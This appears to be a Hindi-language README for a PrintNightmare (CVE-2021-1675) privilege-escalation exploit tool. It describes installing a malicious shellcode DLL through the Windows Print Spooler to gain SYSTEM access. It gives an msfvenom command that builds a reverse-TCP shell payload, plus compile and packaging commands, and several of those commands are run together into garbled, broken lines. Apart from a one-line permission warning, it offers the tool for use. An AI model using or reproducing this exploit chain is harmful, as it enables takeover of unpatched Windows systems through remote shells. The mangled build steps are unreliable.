
CVE-2021-1675 (PrintNightmare) के लिए स्थानीय विशेषाधिकार वृद्धि शोषण जो कमजोर Windows सिस्टम पर SYSTEM पहुंच प्राप्त करने के लिए एक दुर्भावनापूर्ण DLL स्थापित करता है।
src/nightmare.cpp: CVE-2021-1675 का शोषण करने और दुर्भावनापूर्ण dll स्थापित करके सिस्टम एक्सेस प्राप्त करने के लिए सोर्स कोड src/payload-dll.cpp: एंट्री फ़ंक्शन में दुर्भावनापूर्ण शेलकोड वाले dll के लिए सोर्स कोड
!!केवल उन सर्वरों के विरुद्ध उपयोग करें जिन पर आपके पास परीक्षण करने की अनुमति है
CVE-2021-1675 Microsoft Windows की Print Spooler Service में एक कमजोरी है जो हमलावर को SeLoadDriverPrivilege जांच को बायपास करने की अनुमति देती है। इसका उपयोग लक्षित मशीन पर एक दुर्भावनापूर्ण DLL स्थापित करके विशेषाधिकार वृद्धि प्राप्त करने के लिए किया जा सकता है, जो शेलकोड को कॉल करता है या रिवर्स शेल कनेक्शन स्थापित करने के लिए Window API का उपयोग करता है। जून 8, 2021 से पहले के Windows 10/8/Server 2008/Server 2012 के संस्करण प्रभावित हैं।
$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f cx86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp
x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspoolx86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -sharedzip ./bin/PrinterNightmareLPE.exe ./lib/